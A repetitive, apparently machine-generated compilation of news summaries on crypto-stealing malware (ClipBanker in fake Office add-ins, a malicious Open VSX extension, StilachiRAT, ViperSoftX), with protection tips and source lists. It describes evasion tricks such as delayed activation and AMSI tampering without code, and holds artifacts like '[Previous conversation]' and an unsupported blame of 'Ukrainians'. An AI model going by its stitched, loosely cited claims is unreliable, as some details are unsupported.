Cyber hackers use malicious Microsoft Office add-ins and fake extensions to steal cryptocurrency through address spoofing and hidden miners, also Office add-ins and extensions are used to steal cryptocurrency through address spoofing

Crypto hackers plant crypto address spoofing malware in Microsoft Office add-in packages

In early April 2025, cybersecurity company Kaspersky detected a new wave of attacks targeting cryptocurrency users. The attackers developed a special scheme for distributing malware, integrating it into fake add-in packages for Microsoft Office, which were hosted on the popular SourceForge platform 1 2 3 .

The gist of the attack: how the malicious scheme works

The malware, dubbed ClipBanker, was disguised as legitimate Office extensions. It was distributed via a fake SourceForge project page that mimicked the official site for Office add-in developers, offered download buttons, and could appear in search results as a regular Office 2 4 5 utility .

The “officepackage” code did contain working Office add-ins, which increased the victims’ trust. However, it also installed a malicious script that performed the following functions:

• Replacing the cryptocurrency address copied by the user to the clipboard with the attacker’s details (the main action of ClipBanker).
• Scanning the system for signs of a previous installation or the presence of antivirus software – if any were found, the malware removed itself.
• Transferring information about the infected device (IP address, country, username, etc.) to hackers via the Telegram service.
• Receiving additional commands from attackers via remote access (using “non-traditional” methods of gaining a foothold in the system) 1 2 3 .

Evidence and characteristics of counterfeiting

Kaspersky experts noted alarming details:

• Some installation files were suspiciously small (this is not typical for office applications, even in an archive).
• Other files, on the contrary, contained “junk” data to create the illusion of a full-size installer and convince the user that it was safe to download 3 .
• The interface of the fake installers was made in Russian, and according to Kaspersky, the target audience was Russian-speaking users. Analytics showed that 90% of potential victims were users from Russia, and only from January to March 2025, 4,604 people encountered this scheme 4 .

Possible consequences of infection

• The victim’s copied wallet address was changed to the attacker’s details – so the money, especially in a one-time or large transfer, could be lost irretrievably with no possibility of return.
• Through malware, Ukrainians/hackers gain access to the infected system and can carry out additional attacks, including selling access to more dangerous criminal groups 1 2 3 .
• The package also included a cryptocurrency miner that uses the infected computer’s resources for mining, which leads to increased load on the system and slowdowns.

Recommendations for protection

Kaspersky strongly recommends downloading software only from trusted and official sources. Particularly high risks are associated with pirated or alternative downloaders, where attackers often pass off malware as legitimate software, creating plausible websites and installation components 1 2 4 3 . The widespread practice of downloading software from untrusted sources leads to new and increasingly sophisticated infection schemes, and fraudsters are constantly improving their disguise.

Mobile threats on the rise

At the same time, other companies are reporting an increase in attacks on cryptocurrency users via malware for Android devices. For example, a Threat Fabric report from March 28, 2025, notes the emergence of the Crocodilus malware – it introduces fake overlays on top of legitimate applications to trick them into providing seed phrases for crypto wallets and full control over the device 6 7 8 . This approach allows fraudsters to completely empty users’ accounts, and the malware is installed by downloading applications from unofficial stores and third-party sites.

These incidents once again confirm that the basis of digital security is the use of only official software sources, attention to installation details, and verification of addresses for any financial transfers in cryptocurrency. The new wave of malware is not an accident, but a natural response of attackers to the growing popularity of crypto transactions and the constant search for loopholes in user habits 1 2 3 4 6 7 8 .

Let’s look at malware attacks that disguise themselves as add-ons or extensions for Microsoft Office, IDEs, and other platforms with the goal of stealing cryptocurrency by spoofing addresses and other types of data compromise:

1. Malicious extensions for Microsoft Office and SourceForge

• Crypto-Stealing Malware in SourceForge: A Cautionary Tale for Cybersecurity Investors
  Cybersecurity Kaspersky has detected advanced malware that was distributed through SourceForge in the form of fake Office add-ins. The virus injected ClipBanker to intercept crypto addresses, sent data to the attackers via Telegram, and sold access to the system to third parties. Particular emphasis is placed on the fact that 90% of the victims are Russians, and the distribution is associated with downloading programs from unverified sources 1 2 3 4 5 .

2. Malicious extensions and plugins in open-source ecosystems

• How extensions from Open VSX were used to steal cryptocurrency
  A Kaspersky article explains how malicious extensions in the Open VSX store (such as “Solidity Language” for Cursor AI) stole crypto wallet seeds from blockchain developers. The losses amounted to hundreds of thousands of dollars. The malware was downloaded as a PowerShell script, installed remote admin tools, and allowed the theft of assets using 6 .

3. Current Trojans for substituting crypto addresses

• StilachiRAT analysis: From system reconnaissance to cryptocurrency theft
  Microsoft analyzes the StilachiRAT bot, which monitors the clipboard, extracts crypto addresses, passwords and transmits them to attackers. The malware has been deployed since the end of 2024, its main victims are users of browsers and cryptocurrency extensions, the attack is especially popular in Asian countries 7 8 .
• Clipbanker threat description
  Detailed description of ClipBanker — a family of Trojans that focus on replacing addresses in the clipboard and stealing banking and crypto data. The software is actively used by attackers: it has learned to bypass antiviruses, disable protection and gain a foothold in the system 9 10 11 .

4. ClipBanker and other methods of intercepting the clipboard

• How Clipboard Hijacking Malware Can Steal Your Crypto
  An expert publication on the operating principle of malware that monitors the clipboard and replaces crypto addresses with their own. It describes methods for recognizing attacks and key recommendations for protecting and preventing such incidents for all cryptocurrency holders, not just business users 12 13 14 15 .

5. New malware in 2025 against crypto users

• ViperSoftX Stealing Cryptocurrencies — ASEC
  Fresh research on the ViperSoftX malware, which steals cryptocurrencies by executing commands from the command and control server, infecting the system and controlling the confidential information of users 16 17 18 .

General conclusions and trends:

• The number of attacks disguised as legitimate add-ons for office and professional programs is growing.
• The most common vector of compromise is the substitution of a crypto address in the clipboard via ClipBanker and similar programs.
• Basic protection tips: carefully select software download sources, regularly update antivirus software, and carefully check addresses for any money transfers 2 1 3 12 .

Cybersecurity company Kaspersky has identified a dangerous campaign of malware disguised as add-ins for Microsoft Office and distributed through the popular platform SourceForge used to host software projects. This campaign poses a serious threat to users, especially in Russia, where more than 4,600 people have encountered it since the beginning of 2025.

The malware includes two key components: a cryptocurrency miner and the ClipBanker Trojan. ClipBanker is designed to steal cryptocurrency by replacing the crypto wallet addresses copied by the user with the addresses of the attackers, which leads to the irretrievable loss of funds. When copying the crypto wallet address, the infected computer automatically replaces it with the attacker’s address, so cryptocurrency transactions are compromised.

Distribution is carried out through fake pages on SourceForge, which imitate real Microsoft office applications, offering a free download. In fact, after downloading and unpacking the archive with a password, the miner and ClipBanker are delivered to the system, while Microsoft Office itself is not present in the downloaded files. This approach misleads users, convincing them of the legitimacy of the software received.

ClipBanker also performs additional functions: it transmits information about the infected device to the attackers via Telegram, including the IP address, country and username, and also checks the system for antiviruses and, if they are detected, is capable of self-destructing to hide traces of infection. In addition to directly stealing cryptocurrency and using the victim’s computing power for mining, attackers can sell access to infected computers to third parties, which increases the scale of the threat.

Particular attention is paid to the fact that 90% of potential victims are located in Russia – users who search for free or pirated software are at particularly high risk of infection by this malware. Kaspersky experts strongly recommend downloading software only from official and trusted sources, since downloading from unofficial resources significantly increases the likelihood of encountering such attacks.

The discovery of the ClipBanker campaign on SourceForge is therefore an important warning to the entire software and cryptocurrency community. It highlights the need for discipline in digital security and the use of official download channels to avoid theft of funds and compromise of personal data.

This case exemplifies modern fraud methods, where malware not only hides behind the guise of legitimate software, but also uses advanced techniques to hide and control devices, which requires users and organizations to increase their level of awareness and vigilance in cybersecurity issues 1 2 3 5 9 10 .

Cybersecurity in Open-Source Ecosystems: How Malicious Open VSX Extensions Steal Cryptocurrency

In June 2025, Kaspersky Lab specialists uncovered a major cyberattack campaign in which attackers used malicious extensions from the Open VSX repository to steal crypto assets from blockchain developers. The main victim was a company developing smart contracts in the Solidity language, which lost about $500,000.

Attack mechanism and features of the malicious extension

The attackers distributed a fake extension called “Solidity Language,” which was supposedly designed for the Cursor AI development environment, an AI-enabled tool based on Visual Studio Code. The extension was positioned as an assistant for optimizing and highlighting code syntax in the Solidity language, which is widely used to create smart contracts on the blockchain.

In fact, the extension did not perform the stated functions, but was a Trojan. After installation, it launched a PowerShell script that:

• Downloaded and launched the ScreenConnect remote administration program;
• With its help, attackers introduced additional malicious components – in particular, the Quasar backdoor and a stealer that collects confidential data from browsers, email clients and crypto wallets;
• The obtained data allowed the criminals to steal the owner’s crypto wallet seed phrases and withdraw funds.

Scale and methods of distribution

The extension was hosted on Open VSX, a repository used by Cursor AI to install open-source extensions. Due to its ranking features, it appeared in the top positions in search results for the query “solidity,” bypassing the legitimate extension with the same name. This led to the fake version being downloaded at least 54,000 times, significantly increasing the number of potential victims.

It was also found that the extension’s downloads and rating were artificially inflated to increase its visibility and user trust.

Technical analysis and consequences for victims

The study showed that the attacked developer’s operating system was recently installed and contained a minimal set of software, which could have contributed to the attack’s success. Despite the use of free antivirus software, the lack of comprehensive security software allowed the malicious code to penetrate quietly and remain undetected.

Through the backdoor, the attackers controlled the infected computer, which gave them the opportunity not only to steal cryptocurrency, but also to gain access to other confidential information.

Protection Recommendations and Lessons for the Community

Kaspersky experts emphasize that even experienced developers can become victims of such attacks, especially when working with cryptocurrencies. To reduce the risks, it is recommended:

• Download extensions only from verified and trusted sources;
• Check the reputation and origin of extensions, pay attention to the number of downloads and reviews;
• Use full-fledged security solutions that can detect and block malicious code;
• Be alert to suspicious requests and security warnings;
• Regularly update software and antivirus databases.

Results

The case of the malicious “Solidity Language” extension for Cursor AI highlights the risks associated with thoughtlessly installing extensions from public open-source repositories. Kaspersky Lab St. Petersburg calls on the community of developers and users of cyber technologies to be more careful and disciplined in downloading and checking software components, especially when it comes to working with cryptocurrencies and sensitive digital information.

This event also demonstrates that attackers are actively using modern methods of social engineering, manipulation of ranking algorithms and remote control technologies to maximize the effectiveness of their attacks and extract large sums of money from gullible victims.

All facts presented are based on Kaspersky Lab’s research and report published in July 2025.

Malicious programs, or Trojans, that specialize in spoofing cryptocurrency addresses remain one of the most dangerous threats to digital asset users in 2024-2025. Among them, the StilachiRAT bots and the ClipBanker family stand out, attracting the attention of researchers and cybersecurity companies due to their sophistication and effectiveness.

StilachiRAT: From System Intelligence to Cryptocurrency Theft

Since late 2024, Microsoft and other security researchers have been closely investigating StilachiRAT, a powerful Trojan that targets users of browsers and cryptocurrency extensions, especially in Asian countries. Its activity is focused on intercepting data from the clipboard, where copied crypto wallet addresses and passwords are usually stored. StilachiRAT carefully monitors this data, extracts crypto addresses and passwords, and then sends this information to attackers to subsequently steal funds from the victims’ crypto wallets.

Key features of StilachiRAT:

• Actively monitor and intercept crypto addresses and passwords from the clipboard.
• Targeting browsers and extensions used to manage cryptocurrencies.
• The attacks are particularly popular in Asian countries, indicating the focus of the campaign.
• The ability to covertly collect data without immediate recognition by users.

ClipBanker: A Trojan Family with a Wide Arsenal of Functions

ClipBanker is another well-known malware family that focuses on replacing clipboard addresses and stealing financial data, including bank details and cryptocurrency wallets. This malware has been successfully used by attackers to conduct targeted attacks on a wide range of users.

ClipBanker Features:

• Substitution of copied crypto wallet addresses with addresses controlled by attackers, which leads to irretrievable loss of funds during transfer.
• The ability to bypass antivirus programs, disable defense mechanisms and reliably gain a foothold in the system, which complicates detection and removal.
• Using various methods of covert implementation and control, including sending data to attackers and remote control of infected devices.
• Distribution through fake extensions, phishing sites and pirated software.

The importance of threats and recommendations for protection

The activity of the StilachiRAT and ClipBanker Trojans highlights the need for increased attention to security when using crypto wallets and related applications. Risks can be significantly reduced by following these recommendations:

• Use only official and trusted sources to download software and extensions.
• Carefully check the copied crypto addresses before sending funds, confirming their correctness.
• Update antivirus software and security systems to detect new threats in a timely manner.
• Avoid using pirated software and suspicious downloaders.
• If you detect suspicious activity on your device, take immediate steps to clean it and restore security.

Thus, StilachiRAT and ClipBanker represent modern and technologically advanced threats targeting cryptocurrency users worldwide. Their effective action is associated with the use of social engineering methods, technical tricks and vulnerabilities in the crypto transaction infrastructure. The high level of risk requires a comprehensive approach to protection and constant raising of awareness of users and organizations about such threats.

ClipBanker malware and methods for intercepting crypto addresses in the clipboard: analysis of an expert publication

In recent years, there has been an increase in the activity of malware specifically designed to attack users of cryptocurrency wallets. One of the most notable and dangerous families of such programs is ClipBanker, a Trojan that organizes the interception and substitution of crypto wallet addresses copied to the clipboard in order to steal funds. Expert publications describe in detail the operating principle of these malicious programs and provide recommendations for their detection and prevention.

How ClipBanker and other clipboard interception malware work

ClipBanker disguises itself as legitimate software and can penetrate a user’s computer by downloading fake or pirated versions of popular programs, such as Microsoft Office from the SourceForge platform. When infected, ClipBanker monitors the operating system’s clipboard in the background – the place where the user temporarily copies data, including crypto wallet addresses.

When a victim copies a wallet address — a standard practice, as manually entering addresses is prone to errors — ClipBanker quietly replaces the copied address string with the attacker’s address. As a result, the user transfers funds to the scammers without suspecting the substitution.

In addition to ClipBanker, there are other Trojans with a similar clipboard interception mechanism, often combining this function with remote control capabilities, hidden cryptocurrency mining, and theft of confidential data. Such malware can check the system for antivirus software and disable protection, and if detected, delete itself to avoid detection.

Methods for Recognizing Clipboard Hijacking Attacks

It is extremely important for cryptocurrency users to be able to recognize possible attacks:

• Suspicious programs and installations: Often, malicious extensions or software come from unverified, pirated sources or under the guise of free versions of well-known products.
• Unusual clipboard behavior: If copying and pasting an address does not produce the same address as the one copied, or if a person notices a discrepancy, this is a signal of possible substitution.
• Increased system activity: Infection may be accompanied by a slowdown in computer operation due to hidden mining.
• Detection in antiviruses: Modern antivirus solutions can detect the presence of Trojans with the function of intercepting the clipboard.

Recommendations for protection and prevention

To prevent theft of funds and ensure security, it is important to follow these guidelines:

• Use only official and trusted sources to download software and extensions. Downloading from pirated sites or unknown resources significantly increases the risk of infection.
• Carefully check wallet addresses before transferring, especially when copying and pasting. It is recommended to check addresses visually and use confirmation functions in crypto wallets as much as possible.
• Regularly update your operating system and antivirus software. Modern antiviruses are capable of blocking many types of Trojans, including ClipBanker.
• Use hardware wallets whenever possible, which reduce the risk of funds being compromised through computer infection.
• Pay attention to unusual device behavior, performance drops, or pop-up errors that may indicate hidden malware activity.

Malicious programs that use the method of substituting crypto addresses in the clipboard represent one of the most sophisticated and effective threats to the security of digital assets. ClipBanker and its analogues combine data interception, hidden mining, bypassing antivirus protection and remote control, which makes them especially dangerous.

User awareness and the use of comprehensive security measures are the main barriers to attackers. Experts strongly recommend not to neglect digital hygiene – download software only from official sources, carefully check crypto addresses and promptly update protection.

These measures will help to significantly reduce the risk of becoming a victim of the clipboard hijacking attacks that are common today and keep your crypto assets safe.

How ClipBanker Intercepts Clipboard and Replaces Crypto Addresses Facts

ClipBanker hijacks the clipboard and replaces cryptocurrency addresses using the following mechanism, based on data from cybersecurity reports:

• ClipBanker often infiltrates a system via fake or pirated Microsoft Office add-ins hosted on sites like SourceForge. Once installed, the malware runs in the background, silently monitoring the contents of the operating system’s clipboard, the area of memory where the user copies data.
• When a user copies a cryptocurrency address (which is common practice for transferring funds, as addresses are long and difficult to type manually), ClipBanker is triggered by “regular expressions” — patterns that it uses to recognize crypto wallet addresses, such as Bitcoin addresses in the bc1 format and others 2 .
• Once ClipBanker detects that there is a cryptocurrency address in the clipboard, it silently replaces the copied string with the attacker’s address from a pre-prepared list. As a result, when the user pastes the address into the payment form, the funds go to the scammers, not the original recipient 1 2 .
• In addition to spoofing addresses, ClipBanker collects information about the infected system (IP address, country, username, etc.) and sends it to hackers via Telegram, which helps attackers monitor ongoing infections 1 .
• ClipBanker can also scan your system for antivirus software or signs of a previous installation and can remove itself to avoid detection 1 .
• The infection is often spread through fake projects and websites posing as legitimate services, which misleads users and increases trust in malware 1 .

Thus, ClipBanker implements clipboard interception at the operating system level, monitors its changes, analyzes the contents for crypto addresses using templates and replaces them with its own, which is a very effective scheme for stealing cryptocurrency. Protection from such attacks requires the use of official sources for downloading software, regularly updating antiviruses and careful monitoring of entered and copied crypto addresses.

Why ClipBanker Malware Is Particularly Effective at Copying Cryptocurrency Addresses

ClipBanker malware is particularly effective at copying crypto addresses for the following reasons:

• ClipBanker works specifically with the clipboard — the memory area where the user usually copies cryptocurrency addresses to avoid manual input errors. This makes the attacks as practical and invisible as possible.
• By using patterns or regular expressions to recognize cryptographic addresses in the clipboard, ClipBanker can quickly and accurately determine the information needed for substitution.
• The replacement of the copied address occurs instantly and unnoticeably for the user, which reduces the likelihood of detecting the substitution.
• ClipBanker operates “filelessly”, that is, it does not leave the usual traces and does not activate common security tools and antiviruses, which makes it even less noticeable.
• By attacking the process of copying addresses, ClipBanker uses a standard, widespread practice among cryptocurrency users, which increases the success of the attack.

Thus, ClipBanker’s high efficiency is due to its focus on the clipboard, accurate recognition of cryptographic addresses and a stealthy attack method that is difficult to track and prevent with standard antiviruses 1 .

In 2025, the threat from sophisticated and technically advanced malware targeting cryptocurrency users continues to grow. One of these new and dangerous malwares is ViperSoftX, which is among the most serious threats to the security of digital assets. Research by security analysts at AhnLab Security Intelligence Center (ASEC) and other experts confirms that ViperSoftX steals cryptocurrencies by executing C&C commands, infecting the system, and controlling users’ sensitive information.

What is ViperSoftX?

ViperSoftX is a multifunctional remote access trojan (RAT), known since 2020, which evolved into powerful malware for stealing data, including cryptographic keys and access to wallets. In 2025, researchers recorded a new, more stable version equipped with sophisticated stealth and detection protection mechanisms. This version implements a well-thought-out life cycle, starting from initialization and ending with interaction with the command and control (C2) server, which allows for effective control of infected devices.

ViperSoftX Attack Mechanisms

• Command control: Once infected, the device connects to the control server, from where it receives commands to download additional modules, collect data, and perform cryptocurrency theft operations.
• Control and data theft: ViperSoftX is capable of stealing data from browsers, cryptocurrency wallets, password managers and other applications, including confidential keys and seed phrases needed to access crypto assets.
• Stealth and Resistance to Removal: The new version of the malware uses advanced camouflage techniques, increases the delay before launch (up to 300 seconds) and uses unique identifiers to prevent repeated launches, which complicates detection and analysis.
• Expanded functionality: The malware downloads modules that can capture the screen, log keystrokes, and perform other types of user surveillance, allowing attackers to take full control of the system.

Trends and implications

• There is a growing number of attacks disguised as legitimate add-ons and extensions for office and professional applications, which mislead users and make it easier to get infected.
• The most common vector of compromise remains the technology of substituting crypto addresses in the clipboard, similar to the actions of the ClipBanker Trojans and its analogues, which leads to direct financial losses.
• The use of a well-protected command server and sophisticated antivirus evasion mechanisms make ViperSoftX one of the most dangerous threats in the crypto space today.

Recommendations for protection

• Download software only from trusted sources. Installing programs and extensions from official sites significantly reduces the risk of infection.
• Regularly updating antivirus and security software capable of detecting and neutralizing modern threats.
• Carefully check all crypto addresses when transferring – especially if the address was copied and pasted from the clipboard.
• Using hardware wallets to store crypto assets reduces the likelihood of compromise by malware.
• Periodic audit and monitoring of system activity to identify suspicious processes and promptly respond to threats.

Conclusion

Research and analytics in 2025 show that cybercriminals are becoming increasingly sophisticated in their use of malware such as ViperSoftX to steal users’ crypto assets. This malware provides complete control over victims’ devices and has significant stealth capabilities, making it particularly dangerous. The simultaneous increase in crypto address spoofing attacks via ClipBanker and similar Trojans confirms that the security of crypto users directly depends on discipline in choosing software sources, being careful in financial transactions, and regularly updating security tools.

Following these recommendations and improving digital hygiene remain key measures to counter the new wave of threats in the world of cryptocurrencies.

Sources: AhnLab Security Intelligence Center (ASEC) reports, Trend Micro and Securitylab research, Avast and Kaspersky publications on ViperSoftX and modern cryptocurrency theft Trojans 1 2 3 4 7 .

How ViperSoftX is mutating and becoming more stealthy and resistant to removal

ViperSoftX malware in 2025 shows significant evolution, becoming increasingly stealthy and resistant to removal due to a number of technical improvements and new implementation methods identified by cybersecurity experts:

• Long, hidden wait before activation: In the new version of ViperSoftX, the infected computer waits up to 300 seconds (5 minutes) before starting the active phase of the attack. This gives the malware the opportunity to bypass behavioral analysis systems and sandboxes that monitor program behavior only in the first seconds of launch 1 .
• Using unique GUIDs instead of static mutexes: To prevent multiple copies from running simultaneously and to increase resistance to reinfection, ViperSoftX uses dynamic identifiers (GUIDs), which complicates detection and analysis 1 .
• Integration with .NET Common Language Runtime (CLR) and AutoIt: ViperSoftX executed malicious code in a PowerShell environment embedded inside AutoIt, managed by the CLR. This architecture allows it to execute complex malicious functions, bypass system protection, and hide from antivirus tools, while avoiding detection by standard PowerShell scanning methods 2 .
• Advanced anti-analysis and security bypass techniques: The malware is capable of modifying anti-virus scanning interfaces (for example, AMSI – AntiMalware Scan Interface) to hide its activity and block communication with browsers, which prevents monitoring and combating the threat 2 .
• Multi-phase launch and infection scenario: Infection begins with malicious payloads hidden in malicious lures (e.g. e-books) that, when launched, reveal a sophisticated scripting engine including PowerShell and AutoIt, making detection and removal difficult 2 .
• Modularity and Dynamic Management: The ViperSoftX architecture has become more flexible, allowing additional command and control modules to be loaded, functionality to be expanded, and adaptation to specific attacker goals 1 .

These changes make ViperSoftX especially dangerous – it is not only effective in stealing cryptocurrencies and sensitive data, but also extremely resistant to traditional detection and removal methods. Modern protections are often powerless without comprehensive behavior analysis and relevant heuristics.

Sources confirm that in 2025, ViperSoftX remains an example of sophisticated, dynamic and highly stealthy malware that deploys innovative techniques to successfully evade cyber defenses and maintain control over infected systems 1 2 .

Why are upgraded versions of ViperSoftX harder to detect and remove?

The upgraded versions of the ViperSoftX malware are more difficult to detect and remove thanks to a number of new technical improvements and stealth techniques:

• The malware delays the activation of its malicious functions for up to 300 seconds, which allows it to bypass behavioral analysis systems and sandboxes that typically monitor program actions only immediately after launch.
• Uses unique dynamic identifiers instead of static ones, making it harder to detect and block repeat launches.
• The malware runs in a complex environment that combines PowerShell, AutoIt, and .NET CLR, which helps it bypass antivirus scans and hide from standard security tools.
• Implements advanced anti-analysis methods, such as modifying anti-virus scanning interfaces (AMSI) and blocking browser monitoring.
• The malware structure has become modular, allowing additional components to be dynamically loaded to expand functionality and adapt to the goals of the attackers.

All these techniques make ViperSoftX very resistant to traditional detection and removal methods, requiring more sophisticated and modern cyber defense tools and constant updating of antivirus databases [Previous conversation].

1. https://telegram.me/s/jetinfosystems?before=1141

1. https://www.securitylab.ru/news/560126.php
2. https://www.securitylab.ru/news/550007.php
3. https://cisoclub.ru/vipersoftx-moshhnaja-ugroza-krazhi-kriptovaljut-cherez-slozhnye-ataki/

1. https://www.itsec.ru/news/infostealer-vipersoftx-stal-eshio-opasnee-sushestvenno-rasshiriv-profil-deyatelnosti
2. https://www.securitylab.ru/news/560126.php
3. https://xn--80ahdqlciafpmxo0iwa.xn--p1ai/news/vredonosnoe-rasshirenie-brauzera-chrome-pokhishchaet-kriptovalyutu-i-paroli-polzovateley/
4. https://1275.ru/tag/vipersoftx
5. https://www.tadviser.ru/index.php/%D0%A1%D1%82%D0%B0%D1%82%D1%8C%D1%8F:%D0%9C%D0%BE%D1%88%D0%B5%D0%BD%D0%BD%D0%B8%D1%87%D0%B5%D1%81%D1%82%D0%B2%D0%BE_%D1%81_%D0%BA%D1%80%D0%B8%D0%BF%D1%82%D0%BE%D0%B2%D0%B0%D0%BB%D1%8E%D1%82%D0%BE%D0%B9
6. https://www.anti-malware.ru/news/2022-11-22-111332/39959
7. https://cisoclub.ru/vipersoftx-moshhnaja-ugroza-krazhi-kriptovaljut-cherez-slozhnye-ataki/
8. https://1275.ru/ioc/vipersoftx-stealer-iocs-2_1862
9. https://jetcsirt.su/digest-page/daydzhest-jet-csirt-25-04-02-05-2023/
10. https://arb.ru/b2c/fun/10593675/

1. https://cloudnetworks.ru/troyan-clipbanker/

Sources: 1 , 2 .

1. https://www.block-chain24.com/news/novosti-bezopasnosti/hakery-skryvayut-vredonosnoe-po-dlya-podmeny-kriptoadresov-v-paketah
2. https://securelist.ru/copy-paste-heist-clipboard-injector-targeting-cryptowallets/107180/

1. https://www.comnews.ru/content/238695/2025-04-08/2025-w15/1009/rossii-rasprostranyaetsya-mayner-pod-vidom-microsoft-office
2. https://securelist.ru/miner-clipbanker-sourceforge-campaign/112217/
3. https://www.kaspersky.ru/about/press-releases/rossijskie-polzovateli-poluchayut-majner-i-troyanec-vmesto-prilozhenij-microsoft-office
4. https://www.anti-malware.ru/news/2025-04-08-121598/45728
5. https://www.gazeta.ru/social/news/2025/04/27/25645340.shtml
6. https://iz.ru/1877632/2025-04-27/ekspert-predupredil-rossian-o-novoi-mosenniceskoi-sheme-s-piratskimi-programmami
7. https://anton-nemkin.ru/tpost/v6ilk7v311-polzovateli-skachivali-mainer-i-troyanet
8. https://cisoclub.ru/vredonosnaja-kampanija-kriptomajning-i-moshennichestvo-pod-prikrytiem/
9. https://myneuralnetworks.ru/neronews/news_97212/
10. https://ib-bank.ru/bisjournal/news/11108

1. https://forklog.com/tag/koshelki

1. https://www.kaspersky.ru/blog/malicious-extensions-for-cursor-ai/40065/
2. https://safe.cnews.ru/news/line/2025-07-10_zloumyshlenniki_ispolzovali
3. https://www.kaspersky.ru/about/press-releases/zloumyshlenniki-ispolzovali-zarazhyonnyj-paket-s-otkrytym-ishodnym-kodom-dlya-krazhi-kriptovalyuty-na-500-tysyach-dollarov
4. https://www.cnews.ru/news/top/2025-07-16_zloumyshlenniki_pohitili
5. https://www.securitylab.ru/news/561225.php
6. https://securelist.ru/open-source-package-for-cursor-ai-turned-into-a-crypto-heist/113003/
7. https://forum.kasperskyclub.ru/topic/469347-kak-vredonosnye-rasshirenija-iz-open-vsx-vorovali-kriptovaljutu-blog-kasperskogo/
8. https://twitter.com/search?q=%23%F0%9D%97%9E%F0%9D%97%97%F0%9D%97%94%F0%9D%97%B6%F0%9D%97%B9%F0%9D%98%86&src=hashtag_click
9. https://x.com/kmscom3

1. https://www.comnews.ru/content/238695/2025-04-08/2025-w15/1009/rossii-rasprostranyaetsya-mayner-pod-vidom-microsoft-office
2. https://www.kaspersky.ru/about/press-releases/rossijskie-polzovateli-poluchayut-majner-i-troyanec-vmesto-prilozhenij-microsoft-office
3. https://securelist.ru/miner-clipbanker-sourceforge-campaign/112217/
4. https://www.anti-malware.ru/news/2025-04-08-121598/45728
5. https://anton-nemkin.ru/tpost/v6ilk7v311-polzovateli-skachivali-mainer-i-troyanet
6. https://www.telecomdaily.ru/news/2025/04/09/mayner-i-troyanec-vmesto-microsoft-office
7. https://safe.cnews.ru/news/line/2025-04-08_rossijskie_polzovateli
8. https://abc-av.ru/news/tpost/m6dze8p5d1-v-nelitsenzionnoi-versii-ms-office-skrit
9. https://iz.ru/1877632/2025-04-27/ekspert-predupredil-rossian-o-novoi-mosenniceskoi-sheme-s-piratskimi-programmami
10. https://www.ferra.ru/news/apps/moshenniki-nachali-maskirovat-virus-dlya-dobychi-kriptovalyuty-pod-microsoft-office-08-04-2025.htm

1. https://securelist.com/miner-clipbanker-sourceforge-campaign/116088/
2. https://cointelegraph.com/news/microsoft-office-extension-packages-hide-malware-replaces-crypto-addresses
3. https://99bitcoins.com/news/fake-microsoft-office-extensions-used-to-spread-crypto-stealing-malware-kaspersky-warns/
4. https://cryptorank.io/news/feed/88172-kaspersky-identifies-a-crypto-theft-malware-on-microsofts-sourceforge
5. https://cryptorank.io/ru/news/feed/cc5d8-fake-microsoft-extensions-embed-malware-to-steal-crypto-report
6. https://cointelegraph.com/news/andriod-malware-crocodilus-can-take-over-phones-to-steal-crypto
7. https://www.tradingview.com/news/cointelegraph:9c8d5c2de094b:0-android-malware-crocodilus-can-take-over-phones-to-steal-crypto/
8. https://dailyhodl.com/2025/04/02/new-malware-targeting-banks-and-crypto-platforms-with-remote-control-and-black-screen-overlays-spreads-report/
9. https://www.anti-malware.ru/news/2025-04-08-121598/45728
10. https://cryptorank.io/ru/news/feed/88172-kaspersky-identifies-a-crypto-theft-malware-on-microsofts-sourceforge
11. https://www.zawya.com/en/press-release/research-and-studies/worldwide-multi-malware-campaign-targets-organizations-using-backdoor-keylogger-and-miner-verwugj4
12. https://www.bitget.com/news/detail/12560604692815
13. https://finance.yahoo.com/news/kaspersky-warns-crypto-stealing-malware-170130429.html
14. https://beincrypto.com/kaspersky-sparkcat-malware-targeting-crypto-wallets/
15. https://www.coinglass.com/id/news/436991
16. https://thehackernews.com/2025/04/cryptocurrency-miner-and-clipper.html
17. https://www.binance.com/en/square/post/04-09-2025-cybersecurity-alert-malware-targets-crypto-wallets-via-fake-microsoft-office-extensions-22668091417537
18. https://www.kaspersky.com/about/press-releases/kaspersky-exposes-hidden-malware-on-github-stealing-personal-data-and-485000-in-bitcoin
19. https://www.tradingview.com/news/cointelegraph:0c3f1ac28094b:0-hackers-hide-crypto-address-swapping-malware-in-microsoft-office-add-in-bundles/
20. https://www.kaspersky.co.uk/about/press-releases/kaspersky-uncovers-global-crypto-mining-campaign-abusing-open-source-siem-agent

1. https://www.ainvest.com/news/crypto-stealing-malware-sourceforge-cautionary-tale-cybersecurity-investors-2504/
2. https://dig.watch/updates/malware-hidden-in-fake-office-add-ins-targets-crypto-users
3. https://cryptorank.io/news/feed/88172-kaspersky-identifies-a-crypto-theft-malware-on-microsofts-sourceforge
4. https://finance.yahoo.com/news/kaspersky-warns-crypto-stealing-malware-170130429.html
5. https://www.bitget.com/news/detail/12560604692815
6. https://www.kaspersky.com/blog/malicious-extensions-for-cursor-ai/53802/
7. https://www.microsoft.com/en-us/security/blog/2025/03/17/stilachirat-analysis-from-system-reconnaissance-to-cryptocurrency-theft/
8. https://natlawreview.com/article/privacy-tip-436-microsoft-warns-crypto-wallet-scanning-malware-stilachirat
9. https://nordvpn.com/cybersecurity/threat-center/clipbanker/
10. https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/
11. https://asec.ahnlab.com/en/32825/
12. https://osl.com/academy/article/how-clipboard-hijacking-malware-can-steal-your-crypto
13. https://www.osl.com/hk-en/academy/article/how-clipboard-hijacking-malware-can-steal-your-crypto
14. https://bitcoinist.com/2-million-cryptocurrency-addresses-monitored-clipboard-hijacking-malware/amp/
15. https://trustwallet.com/blog/security/clipboard-hijacking-attacks-how-to-prevent-them
16. https://asec.ahnlab.com/en/88336/
17. https://www.picussecurity.com/resource/blog/chihuahua-stealer-malware-targets-browser-and-wallet-data
18. https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/
19. https://www.tradingview.com/news/cointelegraph:0c3f1ac28094b:0-hackers-hide-crypto-address-swapping-malware-in-microsoft-office-add-in-bundles/
20. https://www.binance.com/en/square/post/04-09-2025-cybersecurity-alert-malware-targets-crypto-wallets-via-fake-microsoft-office-extensions-22668091417537